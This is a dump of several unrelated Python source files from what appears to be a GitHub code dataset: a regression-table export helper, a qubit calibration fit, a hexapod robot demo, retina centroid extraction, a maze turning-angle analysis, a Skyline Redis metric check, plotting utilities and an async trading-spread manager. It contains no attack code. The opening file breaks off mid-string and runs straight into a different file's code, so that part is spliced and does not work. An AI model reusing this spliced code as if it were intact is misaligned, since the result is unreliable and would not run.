summary_col([est,est],stars=True,float_format_t='%0.2f',float_format_coef='%0.4f',float_format_adjr='%0.2f')\n\n \n if not isinstance(results, list):\n results = [results]\n\n cols = [_col_params(x, stars=stars, float_format_t=float_format_t,float_format_coef=float_format_coef,float_format_adjr=float_format_adjr) for x in\n results]\n\n # Unique column names (pandas has problems merging otherwise)\n if model_names:\n colnames = _make_unique(model_names)\n else:\n colnames = _make_unique([x.columns[0] for x in cols])\n for i in range(len(cols)):\n cols[i].columns = [colnames[i]]\n\n def merg(x, y):\n return x.merge(y, how='outer', right_index=True,\n left_index=True)\n\n summ = reduce(merg, cols)\n\n if regressor_order:\n varnames = summ.index.get_level_values(0).tolist()\n vc = pd.Series(varnames).value_counts()\n varnames = vc.loc[vc == 2].index.tolist()\n ordered = [x for x in regressor_order if x in varnames]\n unordered = [x for x in varnames if x not in regressor_order]\n new_order = ordered + unordered\n other = [x for x in summ.index.get_level_values(0)\n if x not in new_order]\n new_order += other\n if drop_omitted:\n for uo in unordered:\n new_order.remove(uo)\n summ = summ.loc[new_order]\n\n idx = []\n index = summ.index.get_level_values(0)\n for i in range(0, index.shape[0], 2):\n idx.append(index[i])\n if (i + 1) < index.shape[0] and (index[i] == index[i + 1]):\n idx.append(\"\")\n else:\n idx.append(index[i + 1])\n summ.index = idx\n\n # add infos about the models.\n if info_dict:\n cols = [_col_info(x, info_dict.get(x.model.__class__.__name__,\n info_dict)) for x in results]\n else:\n cols = [_col_info(x, getattr(x, \"default_model_infos\", None)) for x in\n results]\n # use unique column names, otherwise the merge will not succeed\n for df, name in zip(cols, _make_unique([df.columns[0] for df in cols])):\n df.columns = [name]\n\n def merg(x, y):\n return x.merge(y, how='outer', right_index=True,\n left_index=True)\n\n info = reduce(merg, cols)\n dat = pd.DataFrame(np.vstack([summ, info])) # pd.concat better, but error\n dat.columns = summ.columns\n dat.index = pd.Index(summ.index.tolist() + info.index.tolist())\n \n dat =dat.drop(index=[\"R-squared\"])\n dat = dat.reset_index()\n return dat\n\n# 输出回归为docx格式\ndef output_docx(dataframe,output_name):\n # 表格样式固定为\"Light Shading\" 样式详见 http://www.voidcn.com/article/p-weenhbxd-bqy.html\n # Sample\n # output_docx(a,path+\"a.docx\")\n doc = docx.Document()\n \n style = doc.styles['Normal']\n font = style.font\n font.name = 'Times New Roman' # 字体\n font.size = Pt(14) # 文字大小\n\n # 按照行列添加表格\n t = doc.add_table(dataframe.shape[0]+1, dataframe.shape[1],style=\"Light Shading\")\n \n # 表头\n for j in range(dataframe.shape[-1]):\n t.cell(0,j).text = dataframe.columns[j]\n t.cell(0,j).paragraphs[0].paragraph_format.alignment = WD_TABLE_ALIGNMENT.CENTER #居中对齐\n t.cell(0,j).paragraphs[0].paragraph_format.space_before=Pt(4) #上行间距\n t.cell(0,j).paragraphs[0].paragraph_format.space_after=Pt(4) #下行间距\n\n # 表身\n for i in range(dataframe.shape[0]):\n for j in range(dataframe.shape[-1]):\n t.cell(i+1,j).text = str(dataframe.values[i,j])\n t.cell(i+1,j).paragraphs[0].paragraph_format.alignment = WD_TABLE_ALIGNMENT.CENTER\n t.cell(i+1,j).paragraphs[0].paragraph_format.space_before=Pt(4)\n t.cell(i+1,j).paragraphs[0].paragraph_format.space_after=Pt(4)\n\n # 表格行高\n t.rows[0].height=Pt(30)\n for i in range(1,len(a)+1):\n t.rows[i].height=Pt(20) \n \n p = doc.add_paragraph()\n run=p.add_run('t-value in parentheses.')\n run.font.name = 'Times New Roman'\n run.font.size = Pt(16)\n p.alignment = WD_ALIGN_PARAGRAPH.CENTER\n p.paragraph_format.space_before=Pt(20)\n p.paragraph_format.space_after=Pt(0)\n \n p = doc.add_paragraph()\n run=p.add_run('* 1.65 xs[0]) else 1\n amp = mul*(ys[-1]-ys[0])\n ofs = np.max(ys) if (amp < 0) else np.min(ys)\n return dict(\n dispscale=1.0, n=0,\n amp=amp, ofs=ofs,\n )","repo_name":"qcrew-lab/qcrew","sub_path":"qcrew/analyze/fit_funcs/displacement_cal.py","file_name":"displacement_cal.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"28533028075","text":"import math\nimport time\nfrom interbotix_xs_modules.hexapod import InterbotixHexapodXS\n\n# This script makes the hexapod body move up and down for approximately 20 seconds\n#\n# To get started, open a terminal and type 'roslaunch interbotix_xshexapod_control xshexapod_control.launch robot_model:=pxmark4'\n# Then change to this directory and type 'python push_ups.py'\n\ndef main():\n bot = InterbotixHexapodXS('pxmark4')\n bot.hex.move_in_place(z=0.08)\n for step in range(500):\n z = 0.08 + 0.05 * math.sin(math.pi * step/25.0)\n bot.hex.move_in_place(z=z, moving_time=0.15, blocking=False)\n time.sleep(0.04)\n bot.hex.reset_hexapod('sleep')\n\nif __name__=='__main__':\n main()\n","repo_name":"Interbotix/interbotix_ros_crawlers","sub_path":"interbotix_ros_xshexapods/examples/python_demos/push_ups.py","file_name":"push_ups.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"9517523058","text":"'''The code takes different centroids for the same particle on different 2D slices\n and create 1 single centroid for the particle in 3D.\n It saves it in a final CSV file that contains number of the particle and coordinates of each centroid.\n'''\n\nimport os\nimport pandas as pd\nimport sys\n\nname_of_retina = sys.argv[1] #'retina1' #\nuniversel_path = sys.argv[2]\n\nprint('We are Detecting only one centroid for', name_of_retina)\n\n# Read the centroids from the original CSV file\ncsv_file = universel_path + name_of_retina + '/3D_images/MyCentroids.csv'\n\ndf = pd.read_csv(csv_file)\n\n# Prepare the output CSV file\ncsv_out_file = universel_path + name_of_retina + '/3D_images/My_one_time_Centroids.csv'\nif os.path.exists(csv_out_file):\n os.remove(csv_out_file)\n print(\"Existing file deleted.\")\nelse:\n print(\"File does not exist.\")\nmy_header = True\n\n# Iterate over unique labels\nmy_label_list = df['label'].unique()\nfor label in my_label_list:\n # Filter the DataFrame for the current label\n resu = df.loc[df['label'] == label]\n\n # Calculate the centroid coordinates\n centroid_img_idx = resu.iloc[int(len(resu) / 2), 0]\n moyx = resu['x_coord'].mean()\n moyy = resu['y_coord'].mean()\n\n # Create a new DataFrame for the centroid\n new_df = pd.DataFrame({'image_idx': [str(centroid_img_idx).zfill(4) + '.png'],\n 'label': [label],\n 'y_coord': [int(moyy)],\n 'x_coord': [int(moyx)]})\n\n # Append the centroid information to the output CSV file\n new_df.to_csv(csv_out_file, mode='a', header=my_header, index=False)\n my_header = False\n\n\n\n","repo_name":"Mellak/Toolbox-for-the-analysis-of-3D-OCT-images-of-murine-retina","sub_path":"StatisticalAnalysis/Extracting_Centroids/Extract_only_1_cenctroid_4Paper.py","file_name":"Extract_only_1_cenctroid_4Paper.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40661770020","text":"from trajectory_inheritance.trajectory_sep_into_states import Traj_sep_by_state\nfrom trajectory_inheritance.get import get\nfrom tqdm import tqdm\nimport pandas as pd\nfrom Directories import network_dir, home\nimport os\nfrom DataFrame.import_excel_dfs import dfs_human, dfs_ant\nimport json\nfrom Analysis.Efficiency.PathLength import PathLength\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom colors import colors_state\n\nstates = {'ab', 'ac', 'b', 'be', 'b1', 'b2', 'c', 'cg', 'e', 'eb', 'eg', 'f', 'g', 'h'}\ncolumns = ['filename', 'size', 'solver', 'state', 'turning radius (norm by 2 pi)'] # 'turning radius (norm by 2 pi)' = accumulated rotation\nplt.rcParams.update({'font.size': 22, 'font.family': 'Times New Roman'})\n\n\nclass BackRoomTurning:\n def __init__(self, unique_states: list):\n self.unique_states = unique_states\n\n def plot(self, df_size, ax):\n # plot results in columns 'turning radius (norm by 2 pi)' in a histogram\n if solver == 'human':\n limits = [[0, 1], [0, 1]]\n elif solver == 'ant':\n limits = [[0, 3], [0, 3]]\n\n c_states = {\"['ab']\": colors_state['ab'],\n \"['ac', 'ab']\": colors_state['ac']}\n\n for (states, df_state_size), lim in zip(df_size.groupby('state'), limits):\n theta = df_state_size['turning radius (norm by 2 pi)']\n ax.hist(theta, range=lim, bins=40,\n color=c_states[states], label=states, alpha=0.5, density=True)\n ax.set_xlabel('accumulated rotation (norm by 2 pi)')\n ax.set_ylabel('count')\n ax.legend()\n ax.set_title(f'{solver} {size}')\n ax.set_xlim(*lim)\n\n @staticmethod\n def to_list(string: str):\n return [eval(x) for x in string.strip('][').split(', ') if len(x) > 0]\n\n def calc_turning_angle(self, df) -> pd.DataFrame:\n new_results = pd.DataFrame(columns=columns)\n for filename in tqdm(df['filename']):\n x = get(filename)\n print(x.filename)\n\n ts = time_series_dict[x.filename]\n ts_extended = Traj_sep_by_state.extend_time_series_to_match_frames(ts, x)\n traj_parts = Traj_sep_by_state(x, ts_extended).get_states(wanted_states=self.unique_states)\n\n for traj_part in traj_parts:\n d_theta = PathLength(traj_part).rotational_distance(norm=False)\n print(filename, round(d_theta / (2 * np.pi), 3), list(set(traj_part.states)))\n d = {'filename': filename, 'size': x.size, 'solver': x.solver,\n 'state': list(set(traj_part.states)),\n 'turning radius (norm by 2 pi)': round(d_theta / (2 * np.pi), 3),\n }\n new_results = new_results.append(d, ignore_index=True)\n return new_results\n\n def calc_turning_angle_intermediate(self, df) -> pd.DataFrame:\n new_results = pd.DataFrame(columns=columns)\n for filename in tqdm(df['filename']):\n # if filename == 'M_SPT_5050016_MSpecialT_1':\n x = get(filename)\n print(x.filename)\n\n ts = time_series_dict[x.filename]\n ts_extended = Traj_sep_by_state.extend_time_series_to_match_frames(ts, x)\n x.smooth(sec_smooth=1)\n traj_parts = Traj_sep_by_state(x, ts_extended).get_states(wanted_states=self.unique_states)\n traj_parts = [t.split_at_directional_change_in_turning() for t in traj_parts]\n traj_parts = [item for sublist in traj_parts for item in sublist]\n\n for traj_part in tqdm(traj_parts, desc=filename):\n d_theta = PathLength(traj_part).rotational_distance(norm=False, smooth=False)\n print(filename, round(d_theta / (2 * np.pi), 3), list(set(traj_part.states)))\n d = {'filename': filename, 'size': x.size, 'solver': x.solver,\n 'state': list(set(traj_part.states)),\n 'turning radius (norm by 2 pi)': round(d_theta / (2 * np.pi), 3),\n }\n new_results = new_results.append(d, ignore_index=True)\n return new_results\n\n\nif __name__ == '__main__':\n with open(os.path.join(network_dir, 'time_series_selected_states.json'), 'r') as json_file:\n time_series_dict = json.load(json_file)\n json_file.close()\n unique_s = ['ab', 'ac']\n brt = BackRoomTurning(unique_states=unique_s)\n\n fig, axs = plt.subplots(2, 5, figsize=(25, 8))\n\n # new_results.to_excel(directory)\n for solver, dfs, ax in [['ant', dfs_ant, axs[0]], ['human', dfs_human, axs[1]], ]:\n directory = os.path.join(home, 'Analysis', 'discretisation',\n 'overturning_in_ab_ac_' + solver + '_intermediate.xlsx')\n results = pd.read_excel(directory, usecols=columns)\n results['size'] = results['size'].replace('Small Far', 'Small')\n results['size'] = results['size'].replace('Small Near', 'Small')\n for (size, df_size), a in zip(dfs.items(), ax):\n # turning radius when in unique states\n # directory = os.path.join(home, 'Analysis', 'discretisation', 'overturning_in_ab_ac_humans.xlsx')\n # new_results = brt.calc_turning_angle(pd.concat(dfs_ant))\n # new_results.to_excel(directory)\n\n # turning radius when in unique states and turning in the same direction\n # new_results = brt.calc_turning_angle_intermediate(pd.concat(dfs))\n\n results_size = results[results['filename'].isin(df_size['filename'])]\n brt.plot(results_size, a)\n plt.tight_layout()\n plt.savefig('images\\\\turning_angle\\\\' + 'turning_angle.png')\n plt.savefig('images\\\\turning_angle\\\\' + 'turning_angle.pdf')\n plt.savefig('images\\\\turning_angle\\\\' + 'turning_angle.svg')\n # for size, df in dfs_human.items():\n # coords = e_p[e_p['size'] == size]['extremal point'].map(ExtremalPoints.to_list).tolist()\n #\n # extr_points = ExtremalPoints(coordinates=coords, unique_state=unique_s)\n # cs = ConfigSpace_Maze('human', size, 'SPT',\n # ('MazeDimensions_human.xlsx', 'LoadDimensions_human.xlsx'))\n # cs.visualize_space()\n # extr_points.plot_in_cs(cs)\n #\n # mlab.show()\n DEBUG = 1\n","repo_name":"TabeaHeckenthaler/AntsShapes","sub_path":"Analysis/discretisation/overturning_in_ab_ac.py","file_name":"overturning_in_ab_ac.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38253708919","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\n\n\ndef plot_roc_binary(true, score, path, name):\n for ix, (tr, sc) in enumerate(zip(true, score)):\n fpr, tpr, thresholds = metrics.roc_curve(tr, sc)\n plt.plot(fpr, tpr, label=f'Epoch {(ix + 1) * 10}')\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n plt.title('ROC curve of ' + name)\n plt.legend(loc='best')\n plt.savefig(path)\n plt.show()\n\n\ndef plot_roc(roc, path, name):\n plt.plot(roc, label='ROC AUC')\n plt.legend(frameon=False)\n plt.ylabel('ROC AUC')\n plt.title('ROC AUC Score of ' + name)\n plt.xlabel('Epoch')\n plt.savefig(path)\n plt.show()\n\n\ndef plot_loss(train_loss, test_loss, path, name):\n plt.plot(train_loss, label='Training loss')\n plt.plot(test_loss, label='Validation loss')\n plt.legend(frameon=False)\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.title(f'Loss of ' + name)\n plt.savefig(path)\n plt.show()\n\n\ndef plot_acc(train_acc, test_acc, path, name):\n plt.plot(train_acc, label='Training Acc')\n plt.plot(test_acc, label='Validation Acc')\n plt.legend(frameon=False)\n plt.ylabel('Percentage')\n plt.xlabel('Epoch')\n plt.title(f'Binary accuracy of ' + name)\n plt.savefig(path)\n plt.show()\n\n\ndef fill_labels(labels):\n labels = labels.reshape((len(labels), 1))\n for i in range(18):\n z = np.zeros((len(labels), 1))\n labels = np.append(labels, z, axis=1)\n return labels\n","repo_name":"stefanDeveloper/covid-19-neural-network","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4416328106","text":"\"\"\"\nis_derivative.py\n\"\"\"\nimport logging\nimport traceback\n\nfrom settings import FULL_NAMESPACE\nfrom skyline_functions import get_redis_conn_decoded\n\n\n# @added 20220406 - Feature #4520: settings - ZERO_FILL_NAMESPACES\n# Feature #4518: settings - LAST_KNOWN_VALUE_NAMESPACES\ndef is_derivative(current_skyline_app, metric):\n \"\"\"\n Returns a dict of base_names that are no longer active in the data pipeline.\n\n :param current_skyline_app: the app calling the function\n :param namespace: the namespace to access for inactive metrics\n :type current_skyline_app: str\n :type namespace: str\n :return: inactive_metrics\n :rtype: list\n\n \"\"\"\n function_str = 'functions.metrics.is_derivative'\n current_skyline_app_logger = current_skyline_app + 'Log'\n current_logger = logging.getLogger(current_skyline_app_logger)\n\n try:\n redis_conn_decoded = get_redis_conn_decoded(current_skyline_app)\n except Exception as e:\n current_skyline_app_logger = current_skyline_app + 'Log'\n current_logger = logging.getLogger(current_skyline_app_logger)\n current_logger.error(traceback.format_exc())\n current_logger.error('error :: %s :: %s :: get_redis_conn_decoded failed - %s' % (\n current_skyline_app, function_str, e))\n return False\n\n derivative_metrics = []\n try:\n derivative_metrics = list(redis_conn_decoded.smembers('aet.metrics_manager.derivative_metrics'))\n except Exception as e:\n current_logger.error('error :: %s :: failed to connect to Redis for smembers of derivative_metrics - %s' % (\n function_str, e))\n derivative_metrics = []\n\n if not metric.startswith(FULL_NAMESPACE):\n metric = '%s%s' % (FULL_NAMESPACE, metric)\n\n if metric in derivative_metrics:\n return True\n\n return False\n","repo_name":"earthgecko/skyline","sub_path":"skyline/functions/metrics/is_derivative.py","file_name":"is_derivative.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"68"} +{"seq_id":"35951857085","text":"from fastapi.encoders import jsonable_encoder\nfrom commons_telegram import *\nfrom respositories import *\nimport pandas as pd\nimport asyncio\nimport datetime\n\n\n\nclass AlgoSpread:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.SpreadsRepository = None\n\n\n async def async_init(self):\n self.SpreadsRepository = await get_SpreadsRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_spreads_strategy(self, strategy):\n try:\n spreads = await self.SpreadsRepository.fetch_by_strategy(strategy)\n if len(spreads) == 0:\n raise DataNotFoundException(f\"Spread data not found {strategy}\")\n # return [SpreadsSchemaOut(**record.__dict__) for record in spreads]\n return jsonable_encoder(spreads)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_spreads_strategy_status(self, strategy,status):\n try:\n spreads = await self.SpreadsRepository.fetch_by_strategy_status(strategy,status)\n if len(spreads) == 0:\n raise DataNotFoundException(f\"Spread data not found {strategy}\")\n # return [SpreadsSchemaOut(**record.__dict__) for record in spreads]\n return jsonable_encoder(spreads)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_spread(self, spreadid):\n try:\n spread_data = await self.SpreadsRepository.fetch_by_spreadid(spreadid)\n if spread_data is None:\n raise DataNotFoundException(f\"Spread data not found\")\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_spreads_all(self):\n try:\n spreads = await self.SpreadsRepository.fetch_all()\n if len(spreads) == 0:\n raise DataNotFoundException(f\"Spread data not found\")\n\n # return [SpreadsSchemaOut(**record.__dict__) for record in spreads]\n return jsonable_encoder(spreads)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def calculate_margin(self, spread):\n pass\n\n async def update(self, spread):\n try:\n spread_data = await self.SpreadsRepository.update(spread)\n if spread_data is None:\n raise DataNotFoundException(f\"Spread data not found\")\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def delete(self, spreadid):\n try:\n spread_data = await self.SpreadsRepository.delete(spreadid)\n if spread_data is None:\n raise DataNotFoundException(f\"Spread data not found {spreadid}\")\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def create(self,spread):\n try:\n spread_data = await self.SpreadsRepository.create(spread)\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def create_credit_spread(self,signal):\n pass\n # leg1CreateOrder = CreateOrderSchema(strategy=\"string\",\n # exchange=\"NSE\",\n # segment=\"nse_cm\",\n # symbol=\"string\",\n # productType=\"CNC\",\n # orderType=\"L\",\n # orderPurpose=\"Entry\",\n # transactionType=\"B\",\n # quantity=0,\n # orderPrice=0,\n # triggerPrice=0,\n # validity=\"DAY\",\n # amo=\"NO\",\n # tag=\"\"\n # )\n #\n # leg2CreateOrder = CreateOrderSchema(strategy=\"string\",\n # exchange=\"NSE\",\n # segment=\"nse_cm\",\n # symbol=\"string\",\n # productType=\"CNC\",\n # orderType=\"L\",\n # orderPurpose=\"Entry\",\n # transactionType=\"B\",\n # quantity=0,\n # orderPrice=0,\n # triggerPrice=0,\n # validity=\"DAY\",\n # amo=\"NO\",\n # tag=\"\"\n # )\n #\n # leg1Details = await self.algoTrade.entry(leg1CreateOrder)\n # leg2Details = await self.algoTrade.entry(leg2CreateOrder)\n #\n # await self.create(spread)\n\n\n async def create_debit_spread(self,signal):\n pass\n\n async def create_naked_spread(self,signal):\n algoTrade = AlgoTrade(self.broker,self.userid)\n\n # leg1CreateOrder = CreateOrderSchema(strategy=signal.get('strategy'),\n # exchange=signal.get('exchange'),\n # segment=signal.get('segment'),\n # symbol=signal.get('symbol'),\n # productType=signal.get('productType'),\n # orderType=signal.get('orderType'),\n # orderPurpose=signal.get('orderPurpose'),\n # transactionType=signal.get('transactionType'),\n # quantity=signal.get('quantity'),\n # orderPrice=signal.get('orderPrice'),\n # triggerPrice=signal.get('triggerPrice'),\n # validity=signal.get('validity'),\n # amo=signal.get('amo'),\n # tag=signal.get('tag')\n # )\n\n leg1Details = await algoTrade.entry(signal)\n\n spread_data = SpreadsSchemaIn(Broker=self.broker,\n UserId=self.userid,\n Date=str(datetime.date.today()),\n Symbol=signal.get('symbol'),\n Status=\"Active\",\n ExpiryDate=\"2023-12-31\",\n ExpiryType=\"Weekly_Expiry\",\n ProductType=signal.get('productType'),\n Exchange=signal.get('exchange'),\n Segment=signal.get('segment'),\n TradeType=\"Systematic\",\n Trend=\"Buy\",\n Spot_Price=150.0,\n Strike=160.0,\n Leg1_Strike=0,\n Leg1_Side='Buy',\n Leg1_Symbol=signal.get('symbol'),\n Leg1_Qty=signal.get('quantity'),\n Leg1_BuyPrice=0,\n Leg1_BuyOrderId=leg1Details['data'][0].get('nOrdNo'),\n Leg1_SellPrice=0,\n Leg1_SellOrderId=0,\n Leg1_Sl_Price=0,\n Leg1_Sl_OrderId=0,\n Leg1_Tg_Price=0,\n Leg1_Tg_OrderId=0,\n Leg1_Pnl=0,\n Leg2_Strike=0,\n Leg2_Side=None,\n Leg2_Symbol='xxx',\n Leg2_Qty=0,\n Leg2_BuyPrice=0,\n Leg2_BuyOrderId=0,\n Leg2_SellPrice=0,\n Leg2_SellOrderId=0,\n Leg2_Sl_Price=0,\n Leg2_Sl_OrderId=0,\n Leg2_Tg_Price=0,\n Leg2_Tg_OrderId=0,\n Leg2_Pnl=0,\n Trade_StartTime=str(datetime.datetime.now().replace(microsecond=0)),\n Trade_EndTime=str(datetime.datetime.now().replace(microsecond=0)),\n Total_Premium=250.0,\n Total_Sl=17.0,\n LastPrice=155.0,\n LastPriceDate=str(datetime.datetime.now().replace(microsecond=0)),\n MarketValue=750.0,\n Strategy=signal.get('strategy'),\n Instrument=signal.get('instrument'),\n Pyramid=1,\n UnderlyingSymbol=signal.get('underlyingSymbol'),\n TradeDuration=signal.get('tradeDuration'),\n SpreadNumber=1,\n SpreadType=\"NakedBuy\",\n SpreadStatus=\"Full\",\n Pnl=150.0,\n Charges=5.0,\n PnlNet=145.0,\n Remarks=\"This is a dummy record\",\n )\n\n # spread_data = SpreadsSchemaIn(Broker=self.broker,\n # UserId=self.userid,\n # Date=str(datetime.date.today()),\n # Symbol=signal.get('symbol'),\n # Status=\"Active\",\n # ExpiryDate=\"2023-12-31\",\n # ExpiryType=\"Weekly_Expiry\",\n # ProductType=signal.get('productType'),\n # Exchange=signal.get('exchange'),\n # Segment=signal.get('segment'),\n # TradeType=\"Systematic\",\n # Trend=\"Buy\",\n # Spot_Price=150.0,\n # Strike=160.0,\n # Leg1_Strike=leg1Details.get(''),\n # Leg1_Side=leg1Details.get(''),\n # Leg1_Symbol=leg1Details.get(''),\n # Leg1_Qty=leg1Details.get(''),\n # Leg1_BuyPrice=leg1Details.get(''),\n # Leg1_BuyOrderId=leg1Details.get(''),\n # Leg1_SellPrice=leg1Details.get(''),\n # Leg1_SellOrderId=leg1Details.get(''),\n # Leg1_Sl_Price=leg1Details.get(''),\n # Leg1_Sl_OrderId=leg1Details.get(''),\n # Leg1_Tg_Price=leg1Details.get(''),\n # Leg1_Tg_OrderId=leg1Details.get(''),\n # Leg1_Pnl=leg1Details.get(''),\n # Leg2_Strike=leg1Details.get(''),\n # Leg2_Side=leg1Details.get(''),\n # Leg2_Symbol=leg1Details.get(''),\n # Leg2_Qty=leg1Details.get(''),\n # Leg2_BuyPrice=leg1Details.get(''),\n # Leg2_BuyOrderId=leg1Details.get(''),\n # Leg2_SellPrice=leg1Details.get(''),\n # Leg2_SellOrderId=leg1Details.get(''),\n # Leg2_Sl_Price=leg1Details.get(''),\n # Leg2_Sl_OrderId=leg1Details.get(''),\n # Leg2_Tg_Price=leg1Details.get(''),\n # Leg2_Tg_OrderId=leg1Details.get(''),\n # Leg2_Pnl=leg1Details.get(''),\n # Trade_StartTime=str(datetime.datetime.now().replace(microsecond=0)),\n # Trade_EndTime=str(datetime.datetime.now().replace(microsecond=0)),\n # Total_Premium=250.0,\n # Total_Sl=17.0,\n # LastPrice=155.0,\n # LastPriceDate=str(datetime.datetime.now().replace(microsecond=0)),\n # MarketValue=750.0,\n # Strategy=signal.get('strategy'),\n # Instrument=signal.get('instrument'),\n # Pyramid=1,\n # UnderlyingSymbol=signal.get('underlyingSymbol'),\n # TradeDuration=signal.get('tradeDuration'),\n # SpreadNumber=1,\n # SpreadType=\"NakedBuy\",\n # SpreadStatus=\"Full\",\n # Pnl=150.0,\n # Charges=5.0,\n # PnlNet=145.0,\n # Remarks=\"This is a dummy record\",\n # )\n\n spread = await self.create(spread_data)\n return spread\n\n async def create_strangle_spread(self,signal):\n pass\n\n\nclass AlgoHedge:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.HedgesRepository = None\n\n async def async_init(self):\n self.HedgesRepository = await get_HedgesRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_hedges_strategy(self, strategy):\n try:\n hedges = await self.HedgesRepository.fetch_by_strategy(strategy)\n if len(hedges) == 0:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return [HedgesSchemaOut(**record.__dict__) for record in hedges]\n return jsonable_encoder(hedges)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n async def get_hedges_strategy_status(self, strategy,status):\n try:\n hedges = await self.HedgesRepository.fetch_by_strategy_status(strategy,status)\n if len(hedges) == 0:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return [HedgesSchemaOut(**record.__dict__) for record in hedges]\n return jsonable_encoder(hedges)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_hedge(self, hedgeid):\n try:\n hedge_data = await self.HedgesRepository.fetch_by_hedgeid(hedgeid)\n if hedge_data is None:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_hedges_all(self):\n try:\n hedges = await self.HedgesRepository.fetch_all()\n if len(hedges) == 0:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return [HedgesSchemaOut(**record.__dict__) for record in hedges]\n return jsonable_encoder(hedges)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\n async def update(self, hedge):\n try:\n hedge_data = await self.HedgesRepository.update(hedge)\n if hedge_data is None:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def delete(self, hedgeid):\n try:\n hedge_data = await self.HedgesRepository.delete(hedgeid)\n if hedge_data is None:\n raise DataNotFoundException(f\"Hedge data not found {hedgeid}\")\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def create(self,hedge):\n try:\n hedge_data = await self.HedgesRepository.create(hedge)\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\nclass AlgoPLFundsRisk:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.PLFundsRiskRepository = None\n\n async def async_init(self):\n self.PLFundsRiskRepository = await get_PLFundsRiskRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_plfundsrisks_data(self, date):\n try:\n plfundsrisks = await self.PLFundsRiskRepository.fetch_by_date(date)\n if len(plfundsrisks) == 0:\n raise DataNotFoundException(f\"PLFundsRisk data not found : {date}\")\n # return [PLFundsRiskSchema(**record.__dict__) for record in plfundsrisks]\n return jsonable_encoder(plfundsrisks)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\n async def get_plfundsrisks_all(self):\n try:\n plfundsrisks = await self.PLFundsRiskRepository.fetch_all()\n if len(plfundsrisks) == 0:\n raise DataNotFoundException(f\"PLFundsRisk data not found\")\n # return [PLFundsRiskSchema(**record.__dict__) for record in plfundsrisks]\n return jsonable_encoder(plfundsrisks)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\nclass AlgoPLDateSummary:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.PLDateSummaryRepository = None\n\n async def async_init(self):\n self.PLDateSummaryRepository = await get_PLDateSummaryRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_pldatesummarys_data(self, date):\n try:\n pldatesummarys = await self.PLDateSummaryRepository.fetch_by_date(date)\n if len(pldatesummarys) == 0:\n raise DataNotFoundException(f\"PLDateSummary data not found : {date}\")\n # return [PLDateSummarySchema(**record.__dict__) for record in pldatesummarys]\n return jsonable_encoder(pldatesummarys)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\n async def get_pldatesummarys_all(self):\n try:\n pldatesummarys= await self.PLDateSummaryRepository.fetch_all()\n if len(pldatesummarys) == 0:\n raise DataNotFoundException(f\"PLDateSummary data not found\")\n # return [PLDateSummarySchema(**record.__dict__) for record in pldatesummarys]\n return jsonable_encoder(pldatesummarys)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\nclass AlgoTrade:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.algoBroker = AlgoBroker(self.broker, self.userid)\n\n async def async_init(self):\n return 